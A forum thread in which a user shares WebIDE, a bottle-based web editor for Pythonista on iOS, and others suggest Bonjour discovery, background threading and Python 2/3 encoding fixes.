WebIDE The other day I was going to work on a program on my iPad, while sitting next to my laptop. It seemed silly to be writing on an on-screen keyboard when I had a nice keyboard right next to me. Codea has a feature called AirCode, which starts up a web server on the iPad which lets you connect using a computer and write code in a browser and save it to the iPad when you're done. I made something like this using bottle for Pythonista. It doesn't work on my iPad because I have an old version of Pythonista (my iPad can only run iOS 5.1.1), but I have tested it on an iPod with the latest version of Pythonista. If anyone has any suggestions or bug reports, I'd be glad to hear them. Also, if anyone has any idea why it doesn't work on old Pythonista, I'd really appreciate help. GitHub project here: . - Webmaster4o @dgelessus Maybe, I've never noticed that in Finder. This isn't really the main functionality of Transmit, it's a general purpose FTP client, but I certainly appreciate this feature, as it works absolutely seamlessly. Yeah, I'm pretty sure OS X has the ability to mount an FTP server like a flash drive natively. Anyways, it should be pretty trivial to make an FTP server in Pythonista, using something like this: python ftp server example Finally tried this, and I have to say: Very cool idea and impressive implementation! Thanks for sharing! I wonder if it might be possible to run the server on a background thread, so that it doesn't block the interpreter, and it would be possible to add a "Run" button in the web interface... Another interesting addition might be Bonjour support via objc_util( NSNetServiceor something). I don't really have experience with this, so I don't know how hard that would be, but when using Safari/Mac, you wouldn't have to know the IP address of the iOS device... - Webmaster4o @omz From when I've used bonjour, it's really quite cool. The VNC app I use supports it out of the box, and it's really neat. With no prior setup, I can VNC into my macbook from my iPad, and I don't have anything running on the MacBook. They kind of just magically discover each other :) I've implemented Bonjour support, see my pull request. This way, "Pythonista WebIDE" automagically shows up in Safari's bookmarks menu when it's running. You may need to enable the Bonjour menu in Safari's Advanced preferences. - AtomBombed This is awesome. Thanks for making this. Now I just need to figure out a way to access it at my school computers. to run the server on a background thread, so that it doesn't block the interpreter, I tried to run it under the famous Stash shell. but Stash only supports python 2, and this is for python 3. File "...WebIDE.py" with open(fullname, encoding = 'utf-8', mode = 'r') as in_file: # Open the file... TypeError: 'encoding' is an invalid keyword argument for this function so the problem is function open after google I added some lines like this: import sys if sys.version_info.major == 2: import codecs open = codecs.open now it's t compatible with both python 2 and 3. another little modification to support utf-8 editing: change def submit(): # This function will get called for each POST request to / ... f.write(request.forms.get('code').replace('\r', '')) # And dump our code into it to: f.write(request.forms.code.replace('\r', '')) see [](link url) If you use the alternative direct property access request.query.q or forms.q Bottle will give you Unicode strings instead, decoded from the byte version using UTF-8. It's usually best to work with these Unicode strings wherever you can.
https://forum.omz-software.com/topic/2714/webide/13
CC-MAIN-2020-10
refinedweb
654
63.9
LLDB on Windows should now be able to demangle Linux/Android symbols. Also updated CxaDemangle.cpp to be compatible with MSVC. Depends on D9949, D9954, D10048. Unless we have a specific reason not to (which nobody has spoken up about yet), I would prefer for this to be a standalone .cpp file which compiles to an object file, instead of a .inc file. I can't think of any reason not to do this, but +greg and ed maste in case there is something about their platforms which would necessitate it being an inline file. Is there a reason why we didn't need these defines before but we need them now? In any case, llvm has LLVM_NOEXCEPT, LLVM_CONSTEXPR, and LLVM_ALIGNAS, which all just do the right thing depending on the platform. Seems like we should use those instead. This function is going to get a "Not all control paths return a value" warning. Can you fix that? I think it's for the same reason that we're putting everything here in an anonymous namespace. To prevent collision with a system defined cxa_demangle. I guess we could also solve that problem by putting everything under lldb_private. Do you know the rebind, construct, and destroy are required for allocators in the STL standard, or it's just a MSVC quirk? If it's the former I think we should try to upstream it to libcxxabi, and avoid changing it here. What do you mean by "before"? The builtin demangler wasn't enabled for MSVC. I'll try to upstream the LLVM_* change to libcxxabi, so we don't have to change them in our copy. I mean I see +#define noexcept +#define constexpr +#define snprintf _snprintf +#define alignas(X) __declspec(align(X)) but I dont' see corresponding -'s from anywhere else in the diff. So it looks like this is new code, not moved from somewhere else. Unless I'm just missing something. But now that I think about it, it looks like it's just because all this was previously compiled out on Windows, and now it's being compiled on Windows. Since we've inlined a copy of the code already anyway, personally I don't see anything wrong with making small changes like this just to get it to compile on all platforms. I mean I wouldn't think it wise to change some of the actual logic of the demangling, but just adding decorators on functions to get it to compile would be ok I would think? Others may disagree though :) Yeah, the the entire thing didn't compile on Windows before. Virgile Bello tried to add these in r205769 but was reverted by emaste in r205776 since it broke FreeBSD. I put these here because I think it's nicer to have minimal changes to the cxa_demangler copy. Well the thing is that in VS 2015 some of those features will start working, like constexpr. It would be nice to have those C++ features start working automatically once the LLVM macros are changed to reflect the new compiler versions. We should make a .cpp + .h file instead of a .inc file. Addressed review comments. In D10040#178973, @zturner wrote: Well the thing is that in VS 2015 some of those features will start working, like constexpr. It would be nice to have those C++ features start working automatically once the LLVM macros are changed to reflect the new compiler versions. Sounds good to me. It wasn't just FreeBSD broken originally but probably anyone using clang (or any non-MSVC perhaps). I think I was just the first to encounter the build failure. I'm personally not a fan of the implicit bool cast (here and below); do we already use this approach elsewhere?
http://reviews.llvm.org/D10040
CC-MAIN-2021-43
refinedweb
629
73.07
Many people have contributed code included in the Free Software Foundation's distribution of GNU Emacs. To show our appreciation for their public spirit, we list here in alphabetical order those who have written substantial portions. Others too numerous to mention have reported and fixed bugs, and added features to many parts of Emacs. We thank them for their generosity as well. This list is intended to mention every contributor of a major package or feature we currently distribute; if you know of someone we have omitted, please report that as a manual bug. More comprehensive information is available in the ChangeLog files, summarized in the file etc/AUTHORS in the distribution. read-file-nameinput; mb-depth.el, display of minibuffer depth; button.el, the library that implements clickable buttons; face-remap.el, a package for changing the default face in individual buffers; and macroexp.el for macro-expansion. He also worked on an early version of the lexical binding code. diffoutput. locatecommand; find-lisp.el, an Emacs Lisp emulation of the find program; net-utils.el; and the “generic mode” feature. eldoc-mode, a mode to show the defined parameters or the doc string for the Lisp function near point. Calc, an advanced calculator and mathematical tool, since maintained and developed by Jay Belanger; complete.el, a partial completion mechanism; and edmacro.el, a package for editing keyboard macros. allocaimplementation. intangibletext property, and rearranged the structure of the Lisp_Objecttype to allow for more data bits. findcommand-line. refer(the troffversion) and lookbib, and refbib.el, a package to convert those databases to the format used by the LaTeX text formatting package. ediff, an interactive interface to the diff, patch, and merge programs; and Viper, another emulator of the VI editor. dired-mode, with contributions by Lawrence R. Dodd. He also wrote ls-lisp.el, a Lisp emulation of the lscommand for platforms that don't have lsas a standard program. edebugdebug code written using David Gillespie's Common Lisp support; and isearch.el, Emacs's incremental search minor mode. He also co-wrote hideif.el (q.v.). ps-print(with Jim Thompson, Jacques Duthen, and Kenichi Handa), a package for pretty-printing Emacs buffers to PostScript printers; delim-col.el, a package to arrange text into columns; ebnf2ps.el, a package that translates EBNF grammar to a syntactic chart that can be printed to a PostScript printer; and whitespace.el, a package that detects and cleans up excess whitespace in a file (building on an earlier version by Rajesh Vaidheeswarran). info-finderfeature that creates a virtual Info manual of package keywords. autoarg-mode, a global minor mode whereby digit keys supply prefix arguments; autoarg-kp-mode, which redefines the keypad numeric keys to digit arguments; autoconf.el, a mode for editing Autoconf files; cfengine.el, a mode for editing Cfengine files; elide-head.el, a package for eliding boilerplate text from file headers; hl-line.el, a minor mode for highlighting the line in the current window on which point is; cap-words.el, a minor mode for motion in “CapitalizedWordIdentifiers”; latin1-disp.el, a package that lets you display ISO 8859 characters on Latin-1 terminals by setting up appropriate display tables; the version of python.el used prior to Emacs 24.3; smiley.el, a facility for displaying smiley faces; sym-comp.el, a library for performing mode-dependent symbol completion; benchmark.el for timing code execution; and tool-bar.el, a mode to control the display of the Emacs tool bar. With Riccardo Murri he wrote vc-bzr.el, support for the Bazaar version control system. diredcommands on output from the findprogram; grep.el for running the grepcommand; map-ynp.el, a general purpose boolean question-asker; autoload.el, providing semi-automatic maintenance of autoload files. calendarpackage. #ifdefclauses. ebrowse, the C++ browser; jit-lock.el, the Just-In-Time font-lock support mode; tooltip.el, a package for displaying tooltips; authors.el, a package for maintaining the AUTHORS file; and rx.el, a regular expression constructor. PCL-CVS, a directory-level front end to the CVS version control system; reveal.el, a minor mode for automatically revealing invisible text; smerge-mode.el, a minor mode for resolving diff3conflicts; diff-mode.el, a mode for viewing and editing context diffs; css-mode.el for Cascading Style Sheets; bibtex-style.el for BibTeX Style files; mpc.el, a client for the “Music Player Daemon”; smie.el, a generic indentation engine; and pcase.el, implementing ML-style pattern matching. In Emacs 24, he integrated the lexical binding code, cleaned up the CL namespace (making it acceptable to use CL functions at runtime), and added generalized variables to core Emacs Lisp. mailto:URLs. xwshand wintermterminal emulators; and vc-dir.el, displaying the status of version-controlled directories. Daniel also rewrote apropos.el (originally written by Joe Wells), for finding commands, functions, and variables matching a regular expression; and, together with Jim Blandy, co-authored wyse50.el, support for Wyse 50 terminals. He also co-wrote compile.el (q.v.) and ada-stmt.el. etagsprogram. load-historylisp variable, which records the source file from which each lisp function loaded into Emacs came. telnetsessions within Emacs. eshell, a command shell implemented entirely in Emacs Lisp. He also contributed to Org mode (q.v.). mancommand.
https://www.gnu.org/software/emacs/manual/html_node/emacs/Acknowledgments.html
CC-MAIN-2014-10
refinedweb
882
52.56
snprintf(3) - safe sprintf #include <slack/std.h> #ifndef HAVE_SNPRINTF #include <slack/snprintf.h> #endif int snprintf(char *str, size_t size, const char *format, ...); int vsnprintf(char *str, size_t size, const char *format, va_list args); Safe version of sprintf(3) of that doesn't suffer from buffer overruns. int snprintf(char *str, size_t size, const char *format, ...) Writes output to the string str, under control of the format string format, that specifies how subsequent arguments are converted for output. It is similar to sprintf(3), except that size specifies the maximum number of characters to produce. The trailing nul character is counted towards this limit, so you must allocate at least size characters for str. If size is zero, nothing is written and str may be null. Otherwise, output characters beyond the n-1st are discarded rather than being written to str, and a nul character is written at the end of the characters actually written to str. If copying takes place between objects that overlap, the behaviour is undefined. On success, returns the number of characters that would have been written had size been sufficiently large, not counting the terminating nul character. Thus, the nul-terminated output has been completely written if and only if the return value is nonnegative and less than size. On error, returns -1 (i.e. encoding error). Note that if your system already has snprintf(3) but this implementation was installed anyway, it's because the system implementation has a broken return value. Some older implementations (e.g. glibc-2.0) return -1 when the string is truncated rather than returning the number of characters that would have been written had size been sufficiently large (not counting the terminating nul character) as required by ISO/IEC 9899:1999(E). int vsnprintf(char *str, size_t size, const char *format, va_list args) Equivalent to snprintf(3) with the variable argument list specified directly as for vsprintf(3). MT-Safe - provided that the locale is only set by the main thread before starting any other threads. How long is a piece of string? #include <slack/std.h> #ifndef HAVE_SNPRINTF #include <slack/snprintf.h> #endif int main(int ac, char **av) { char *str; int len; len = snprintf(NULL, 0, "%s %d", *av, ac); printf("this string has length %d\n", len); if (!(str = malloc((len + 1) * sizeof(char)))) return EXIT_FAILURE; len = snprintf(str, len + 1, "%s %d", *av, ac); printf("%s %d\n", str, len); free(str); return EXIT_SUCCESS; } Check if truncation occurred: #include <slack/std.h> #ifndef HAVE_SNPRINTF #include <slack/snprintf.h> #endif int main() { char str[16]; int len; len = snprintf(str, 16, "%s %d", "hello world", 1000); printf("%s\n", str); if (len >= 16) printf("length truncated (from %d)\n", len); return EXIT_SUCCESS; } Allocate memory only when needed to prevent truncation: #include <slack/std.h> #ifndef HAVE_SNPRINTF #include <slack/snprintf.h> #endif int main(int ac, char **av) { char buf[16]; char *str = buf; char *extra = NULL; int len; if (!av[1]) return EXIT_FAILURE; if ((len = snprintf(buf, 16, "%s", av[1])) >= 16) if (extra = malloc((len + 1) * sizeof(char))) snprintf(str = extra, len + 1, "%s", av[1]); printf("%s\n", str); if (extra) free(extra); return EXIT_SUCCESS; } The format control string, format, should be interpreted as a multibyte character sequence but it is not. Apart from that, these functions comply with the ISO C 89 formatting requirements specified for the fprintf(3) function (section 7.9.6.1). Even though snprintf(3) is an ISO C 99 function (section 7.19.6.5), this implementation does not support the new ISO C 99 formatting conversions or length modifiers (i.e. %hh[diouxXn], %ll[diouxXn], %j[diouxXn], %z[diouxXn], %t[diouxXn], %ls, %lc and %[aAF]). The main reason is that the local system's sprintf(3) function is used to perform floating point formatting. If the local system can support %[aA], then you must have C99 already and so you must also have snprintf(3) already. If snprintf(3) or vsnprintf(3) require more than 512 bytes of space in which to format a floating point number, but fail to allocate the required space, the floating point number will not be formatted at all and processing will continue. There is no indication to the client that an error occurred. The chances of this happening are remote. It would take a field width or precision greater than the available memory to trigger this bug. Since there are only 15 significant digits in a double and only 18 significant digits in an 80 bit long double (33 significant digits in a 128 bit long double), a precision larger than 15/18/33 serves no purpose and a field width larger than the useful output serves no purpose. printf(3), sprintf(3), vsprintf(3) 2002-2010 raf <raf@raf.org>, 1998 Andrew Tridgell <tridge@samba.org>, 1998 Michael Elkins <me@cs.hmc.edu>, 1998 Thomas Roessler <roessler@guug.de>, 1996-1997 Brandon Long <blong@fiction.net>, 1995 Patrick Powell <papowell@astart.com>
http://libslack.org/manpages/snprintf.3.html
CC-MAIN-2014-42
refinedweb
834
55.03
Everybody knows what a Wizard is. However, for the sake of those who don't, one can find a short introduction below that gives the answer to the mysterious question: "What is a Wizard?" Those of you who feel that he/she knows the answer can skip to the next section. A Wizard is one of the known GUI elements that guides a user, step by step, through an entire process. It consists of the series of dialogs that run, one by one, inside the frame window. A Wizard has buttons to navigate through the pages forward and back and buttons that allow the user to commit or cancel the process. From the Win32 API programming point of view, a Wizard is the PropertySheet control that contains several pages, which are actually the PropertyPage controls. So basically, a Wizard is much the same as a PropertySheet control, but it allows the user to access only the one page at time. That's why its implementation in the Win32 API is the same as for a PropertySheet control. The only thing that has to be done is to define a flag PSH_WIZARD during the creation of a PropertySheet control. PropertySheet PropertyPage PropertySheet PSH_WIZARD A typical example of a Wizard is displayed on the Fig. 1. Fig. 1. The typical view of Wizard page Together with a new style of Internet Explorer, Microsoft has presented a new fashion in Wizard design - the so-called Wizard 97. Since version 5.80 the common control library supports new stylized elements for the Wizard such as a header with title and subtitle, and watermarks (see the Fig. 2). To enable such features, a programmer should just provide a PSH_WIZARD97 flag instead of PSH_WIZARD during creation of a PropertySheet control. PSH_WIZARD97 Fig. 2. An example of the Wizard 97 page with header It's a shame to just pass by such a nice feature of the new common control library, when the implementation is so easy. First of all, be aware that one should never try to implement something, if it has already been done by someone else and already exists somewhere. Life is too short to repeat the same mistakes and rewriting the code. One must not "reinvent the wheel". So the first step to be done is to research existing examples for using Wizard 97. The main sources for that in our case are If one were ever trying to look for some examples about using Wizard 97 one would be astonished with the results of such exploration. There are unexpectedly few of them! The most useful links are The analysis of these samples can make up a set of conclusions: CPropertySheetEx CPropertyPageEx CPropertySheet CPropertyPage CDialog So, it seems like we have to "reinvent the wheel" after all, although it has almost certainly been already done by someone else. The evidence of this is all around us. There we go! Let's create our own example for Wizard 97 using MFC 7 class library. The sky is bright and the road is clear. In MSDN, it is written that all functionality of Wizard 97 is inside two nice basic wrappers CPropertySheet and CPropertyPage. So all we have to do is to write just a few lines of code. Start a new project, let say Wiz97, which is a dialog-based application to keep the things simple. The wizard we'll create contains two pages. First, one for testing the watermarks feature (introduction page), and the second one to use a header with a title and subtitle. There are two dialogs in the resource, the two classes are based on CPropertyPage, and the one class that inherits from CPropertySheet. Also prepare two bitmaps - a small icon for the header and big picture for the watermark of first page. Following the example from the MSDN, the constructors of the classes should be modified as shown below: ... // Modified constructor of the first page (with watermark) CFirstPage::CFirstPage() : CPropertyPage(CFirstPage::IDD) { m_psp.dwFlags |= PSP_DEFAULT|PSP_HIDEHEADER; } ... // Modified constructor of the second page (with banner, title and subtitle) CSecondPage::CSecondPage() : CPropertyPage(CSecondPage::IDD) { m_psp.dwFlags |= PSP_DEFAULT|PSP_USEHEADERTITLE|PSP_USEHEADERSUBTITLE; m_psp.pszHeaderTitle = _T("Title"); m_psp.pszHeaderSubTitle = _T("And subtitle"); } ... // Modified constructor of the property sheet class CWiz97::CWiz97(UINT nIDCaption, CWnd* pParentWnd, UINT iSelectPage) :CPropertySheet(nIDCaption, pParentWnd, iSelectPage) {); } To start a Wizard we just need to add couple lines of code - that's the power of MFC we were expecting: #include "Wiz97.h" ... void CWiz97_1Dlg::OnBnClickedButton1() { CWiz97 dlg(_T("Wizard 97")); dlg.DoModal(); } So we are ready for the first bunch of errors. Compile, run and first result is here. Fig. 3. The first page was supposed to contain watermark, the second header expected an icon There is something wrong here! Of course, the watermark and the header with small image we expected to see are absent. Walking through the source code of the MSDN example and analyzing it can bring us an explanation of first defeat and the way to resolve the problem. The solution is hiding under the one line of code: // Modified constructor of the property sheet class CWiz97::CWiz97(UINT nIDCaption, CWnd* pParentWnd, UINT iSelectPage) :CPropertySheet(nIDCaption, pParentWnd, iSelectPage) { SetWizardMode();); // Next line is very important m_psh.hInstance = AfxGetInstanceHandle(); } It was easy to discover the problem, although one could expect that the instance handler will be preset in the constructor of the MFC class. So let's compile and run again. Don't stress yourself with a new version of our program. We shall fix it a bit later, but right now just take a look at the new view (Fig. 4). Fig. 4. A new astonishing view of the Wizard The positive point is that we can see pictures we've created. But the whole view of our Wizard is still different from the MSDN example. If you have already regained consciousness, then we can continue. It can be fairly hard to discover the roots of the problem. What could we have done wrong? It can take a while to figure out the problem and fix it. Don't try to search in Internet - it's already been done, you won't find some tips or tricks for this problem. Don't try to check a source code either, because our mistakes are not missing flags. I tested a lot of combinations of different flags, attributes, functions, but the final results of these efforts, in contrast to MSDN example, resulted in the difference between Fig. 3 and 4. But nothing is eternal in the Universe. The reason was found. This problem occurs because of the default settings of the project wizard we have used to create the application, the settings for the IE version in the stdafx.h file. Here is the change one should make to get the Wizard to behave as it is supposed to: #ifndef WINVER #define WINVER 0x0400 // Default value is 0x0400 #endif #ifndef _WIN32_WINNT #define _WIN32_WINNT 0x0400 // Default value is 0x0400 #endif #ifndef _WIN32_WINDOWS #define _WIN32_WINDOWS 0x0410 // Default value is 0x0410 #endif #ifndef _WIN32_IE #define _WIN32_IE 0x0500 // Default value is 0x0400 #endif Finally we came to the result, which were expecting since the beginning (See Fig. 5). Fig. 5. The final result You can find more explicit information about constants we have modified under the next link. So, concluding the whole process we just have done, one would find that it's really easy to implement a Wizard 97 by using MFC classes, which are fairly good wrappers for that. But to use a power of MFC, one must be aware of some pitfalls of this approach. I hope this article was useful for you and you'll not have to repeat my mistakes. Thank you all who had enough passion to persevere to the end. This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) // Next line is very important m_psh.hInstance = AfxGetResourceHandle(); // Next line is very important m_psh.hInstance = AfxGetInstanceHandle(); General News Suggestion Question Bug Answer Joke Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
http://www.codeproject.com/Articles/3010/Conquering-Wizard97?fid=11749&tid=1705851
CC-MAIN-2014-35
refinedweb
1,357
62.07
Node.js continues its yearly release cycle with version 12 (codenamed Erbium). Since this is as even-numbered version, it will go into Long Term Support (LTS) beginning on October 2019 and reach its end of life in April 2022. In contrast, the odd-numbered releases are non-LTS and exist for 6–8 months between LTS releases. These are used to prepare for the next LTS release. Node 12 is packed with great features and notable upgrades to the runtime. In addition, since Node uses the V8 engine maintained by Google and used in the Chrome, Node will receive all updates from that as well. Node 12 enters Phase 3 for ECAMScript Modules which correspond to a path to stability of the modules inside Node. Initially, it will still be behind the --experimental-modules flag, and the plan is to remove the flag by the time Node 12 goes into LTS in October. The import/ export syntax has become the preferred module syntax for JavaScript developers since its standardization in ES6, and the Node team has been working diligently to enable it natively. Experimental support began in Node 8.0 at phase 0 and is taking a major step with the newest Node release. All major browsers support ECMAScript modules via <script type="module">, so this is a huge update for Node. Phase 3 will support 3 types of import from ES modules files (works with all built-in Node packages): // default exports import module from 'module' // named exports import { namedExport } from 'module' // namespace exports import * as module from 'module' If you import from a CommonJS package, you can only import using default export syntax import module from 'cjs-library'. You can use dynamic import() expressions to load files at runtime. The import() syntax returns a Promise and works with both ES Modules and CommonJS libraries. Node 12 will initially run on V8 7.4 and eventually upgrade to 7.6 during its lifetime. The V8 team has agreed to provide ABI (Application Binary Interface) stability for this range. Notable improvements with V8 7.4 are performance updates for faster JavaScript execution, better memory management, and broadened ECMAScript syntax support. - Async stack traces - Faster parsing of JavaScript - Faster calls with arguments mismatch - Faster await Node 12 will ship with private class fields (enabled by V8). Private class field variables are only accessible within the class itself and not exposed externally. A private class field is declared by prepending a variable with the # symbol. class Greet { #name = 'World'; get name() { return this.#name; } set name(name) { this.#name = name; } sayHello() { console.log( Hello, ${this.#name}); } } In the above example, if you try to access #name outside of the class, you will receive a syntax error. const greet = new Greet() greet.#name = 'NewName'; // -> SyntaxError console.log(greet.#name) // -> SyntaxError Node 12 will build a code cache for built-in libraries before build time and embed it as a binary. The main thread is able to use this code cache improving the startup time by 30%. Node now supports TLS 1.3 which offers increased security and reduced latency. TLS 1.3 has been a huge update to the protocol and is actively being integrated across the web. By implementing TLS 1.3, Node apps will have increased end-user privacy while also improving the performance of requests by reducing the time required for the HTTPS handshake. In addition, TLS 1.0 and 1.1 have been disabled by default, and the crypto library has removed deprecated functions. Previously the default V8 heap sizes were used which corresponded to 700MB (32-bit systems) or 1400MB (64-bit systems). Node will now determine the heap sizes based on the available memory which will ensure it does not use more than the resources allowed. Node 12 provides the ability to generate a heap dump making it easier to investigate memory issues. Node offers improved ability to diagnose issues (performance, CPU usage, memory, crashes, etc) within applications by providing an experimental diagnostic report feature. N-API was released to provide a more stable and native Node module system that would prevent libraries from breaking on every release by providing an ABI-stable abstraction over native JavaScript APIs. Node 12 offers improved support for N-API in combination with worker threads. - Worker Threads no longer require a flag httphas updated its default parser to be llhttp assertvalidates required arguments and adjusts loose assertions bufferimprovements to make it more stable and secure async_hooksremoves deprecated functionality - Make global.process, global.Buffergetters to improve process - A new welcome message for repl The Node team works very hard to provide yearly updates with huge improvements to Node and the overall JS ecosystem, and version 12 does not disappoint. The full CHANGELOG can be found on GitHub and additional details on the official release article. 2019 has already been a big year for Node with the Node.js Foundation merging with the JS Foundation to form the OpenJS Foundation. We continue the exciting year for JavaScript with the release of Node version 12.
http://brianyang.com/whats-new-in-node-12/
CC-MAIN-2019-39
refinedweb
842
56.05
I'm trying to use the Docker UCD source plugin to pull images from the container service in Bluemix but I just can't get the connection parameters right in the component settings page, and I keep getting errors when I try to run a version import. I have no problem running a simple "cf ic info" in a shell (and as a step in a generic process) so I'm confident I have (most of) the setup in place. UCD 6.2.1.1.788401 on a CentOS 7.2.1511 VMware 10 virtual machine. Just a single agent so far, on the same host as the UCD server. Here's the output from "ct cf info": Date/Time 2016-08-25 09:28:37.08044612 +0200 CEST Debug Mode false Host/URL Registry Host registry.ng.bluemix.net Bluemix API Host/URL Bluemix Org torsten.lif@se.ibm.com(f0bb7038-a220-40f8-a20c-363ff91284ac) Bluemix Space Torsten Lif space(5288b109-3515-42fa-a530-5feaddede433) CLI Version 0.8.934 API Version 3.0 Tue Aug 23 17:27:52 2016 Namespace torstenlif Environment Name prod-dal09p03-kraken2 Containers Limit Unlimited Containers Usage 1 Containers Running 0 CPU Limit (cores) Unlimited CPU Usage (cores) 4 Memory Limit (MB) 2048 Memory Usage (MB) 256 Floating IPs Limit 2 Floating IPs Allocated 0 Public IPs Bound 0 Somwhat inuitively, it appears that the "Registry" entry of the component needs to be: containers-api.ng.bluemix.net:8443 but what should I use for the image name? The image I want to import to UCD is this one: % cf ic images centos1 | grep centos1 registry.ng.bluemix.net/torstenlif/centos1 1 0346736ac2c6 3 weeks ago 70.58 MB I have tried to set image name to centos1, torstenlif/centos1 and registry.ng.bluemix.net/torstenlif/centos1 but all give me a 404-type error: HTTP/1.1 404 NOT FOUND <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>404 Not Found</title> <h1>Not Found</h1> <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p> Caught: java.lang.RuntimeException: Unable to ping registry. Please check credentials and make sure that registry supports v2 api. java.lang.RuntimeException: Unable to ping registry. Please check credentials and make sure that registry supports v2 api. at com.urbancode.air.plugin.docker.RegistryClient.pingRegistry(RegistryClient.groovy:160) at com.urbancode.air.plugin.docker.RegistryClient.getTags(RegistryClient.groovy:173) at com.urbancode.air.plugin.docker.RegistryClient$getTags.call(Unknown Source) at importVersions.run(importVersions.groovy:36) Answer by Taylor_Kohn (1) | Feb 28, 2017 at 11:36 AM I believe the registry in your case should be registry.ng.bluemix.net In the input property tooltip, it states: If image is host:5000/namespace/repository:tag use host:5000. 108 people are following this question. Connecting to UCD REST API from agent behind agent relay 1 Answer "WebSphere Configuration Types" in WAS Config Apply Step 0 Answers How do you prevent UrbanCode from "breaking" ever time there is a Java update? 1 Answer Why does the UCD WAS Configure 'Configuration Discovery' step fail with 'A JSONArray text must start with '[' at character 0 of' after indicating 'Configuration Discovery Complete'? 2 Answers Error importing application:The import data contains encrypted values which could not be decrypted 1 Answer
https://developer.ibm.com/answers/questions/298379/ucd-docker-source-plugin-and-bluemix-ics/
CC-MAIN-2019-26
refinedweb
567
57.98
David, Thanks very much for the tips. I haven't yet got it in a package as I am just using this for testing at the moment though I had managed to find out about number 2 and 3 for myself. Thanks for the hint though. Now I have another problem with the following code: import java.io.*; import java.net.*; import javax.sql.*; import javax.naming.*; import javax.servlet.*; import javax.servlet.http.*; import java.sql.*; /** * * @author Mark * @version */ public class SearchServlet extends HttpServlet { /** Processes requests for both HTTP <code>GET</code> and <code>POST</code> methods. * @param request servlet request * @param response servlet response */ public void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String address = "/privacy.jsp"; DataSource ds = null; InitialContext ctx = null; Connection con = null; Statement stmt = null; int blob = -1; try{ ctx = new InitialContext(); ds = (DataSource) ctx.lookup("java:comp/env/jdbc/TestDB"); con = ds.getConnection(); if (con != null){ address = "/termsandconditions.jsp"; } else { address = "/support.jsp"; } stmt = con.createStatement(); ResultSet rst = stmt.executeQuery("select id, chest from testdata"); blob = rst.getInt("chest"); address = "/testy.jsp?errorcode=" + blob; stmt.close(); con.close(); } catch(NamingException e){ System.out.println(e.toString()); } catch(SQLException sql){ System.out.println(sql.toString()); } RequestDispatcher dispatcher = request.getRequestDispatcher(address); dispatcher.forward(request, response); } Now what I've done is tested it using the if statement above and it detects the changes there and the servlet redirects me to termsandconditions.jsp. I've done this for the connection, statement and result set and none return as being null. However, when I remove the if statement the servlet never gets to the "address = "/testy.jsp?errorcode=" + blob;" line and just redirects me to the privacy.jsp page. If the if statement is still in, it redirects me to the address within the != null part of that. Any ideas why it isn't working and if the database connection is even working at all? Is there a better way to test it? Mark ----- Original Message ----- From: "David Smith" <dns4@cornell.edu> To: "Tomcat Users List" <users@tomcat.apache.org> Sent: Tuesday, February 21, 2006 12:42 PM Subject: Re: Fw: Servlet problem >I get the impression you are a beginner at this. Reading the servlet spec >would go a long way in understanding how the servlet container works. For >the immediate problem: > > 1) Try to get SearchServlet in a package. ie: > com.mycompany.myproject.SearchServlet This isn't strictly required for > servlet classes, but excellent practice none the less. You will need > packaged classes for any supporting classes you develop. > > 2) Map your servlet to a unique url of it's own and not to the url of > existing JSPs. When you map your servlet to a url matching a jsp, the > servlet is executed instead of the jsp per the mapping mechanism. > > 3) The action attribute of your form tag should be to the url you mapped > your servlet to, not it's literal location at > WEB-INF/classes/SearchServlet. Resources inside of WEB-INF are not > directly accessible from the user and you'll get an error if you attempt > it. > > After the servlet does it's thing, it can forward the request to one of > your jsps as necessary. The servlet spec can be found at > > > --David --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org For additional commands, e-mail: users-help@tomcat.apache.org
http://mail-archives.apache.org/mod_mbox/tomcat-users/200602.mbox/%3C008701c636ec$0ec79360$0602a8c0@MarksLaptop%3E
CC-MAIN-2014-15
refinedweb
564
59.5
1 //2 //Informa -- RSS Library for Java3 //Copyright (c) 2002-2003 package de.nava.informa.utils;26 27 /**28 * Handy Dandy Test Data generator. There are two ways of using this. By calling 'generate()' we29 * just generate a stream of different rss urls to use for testing. The stream wraps around30 * eventually. Calling reset() we start the stream up again. Or, you can just call 'get(int)' to get31 * the nth url.32 * 33 */34 public class RssUrlTestData35 {36 37 static int current = 0;38 static String [] xmlURLs = static public String get(int i)98 {99 return xmlURLs[i % xmlURLs.length];100 }101 102 static public String generate()103 {104 return get(current++);105 }106 107 static public void reset()108 {109 current = 0;110 }111 112 } Java API By Example, From Geeks To Geeks. | Our Blog | Conditions of Use | About Us_ |
http://kickjava.com/src/de/nava/informa/utils/RssUrlTestData.java.htm
CC-MAIN-2020-50
refinedweb
142
67.35
The enum flags value modified by the user. This is a selection BitMask where each bit represents an Enum value index. (Note this returned value is not itself an Enum). Displays a menu with an option for every value of the enum type when clicked. An option for the value 0 with name "Nothing" and an option for the value ~0 (that is, all bits set) with the name "Everything" are always displayed at the top of the menu. The names for the values 0 and ~0 can be overriden by defining these values in the enum type. Note: This method only supports enums whose underlying types are supported by Unity's serialization system (sbyte, short, int, byte, ushort, or uint). For enums backed by an unsigned type, the "Everything" option should have the value corresponding to all bits set (i.e. ~0 in an unchecked context or the MaxValue constant for the type). Simple editor window that shows the enum flags field. using UnityEditor; using UnityEngine; class EnumFlagsFieldExample : EditorWindow { enum ExampleFlagsEnum { None = 0, // Custom name for "Nothing" option A = 1 << 0, B = 1 << 1, AB = A | B, // Combination of two flags C = 1 << 2, All = ~0, // Custom name for "Everything" option } ExampleFlagsEnum m_Flags; [MenuItem("Examples/EnumFlagsField Example")] static void OpenWindow() { GetWindow<EnumFlagsFieldExample>().Show(); } void OnGUI() { m_Flags = (ExampleFlagsEnum)EditorGUILayout.EnumFlagsField(m_Flags); } } Did you find this page useful? Please give it a rating:
https://docs.unity3d.com/ScriptReference/EditorGUILayout.EnumFlagsField.html
CC-MAIN-2019-39
refinedweb
232
63.8
